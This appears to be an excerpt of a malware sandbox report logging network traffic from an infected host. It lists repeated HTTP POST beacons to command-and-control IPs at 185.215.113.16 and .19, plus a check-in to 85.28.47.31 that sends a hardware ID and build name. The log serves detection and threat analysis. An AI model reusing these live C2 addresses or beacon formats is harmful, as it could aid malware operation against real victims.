Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="hwid"B125E89D806E2371543510------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build"sila------KKFHJDAEHIEHJJKFBGDA--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
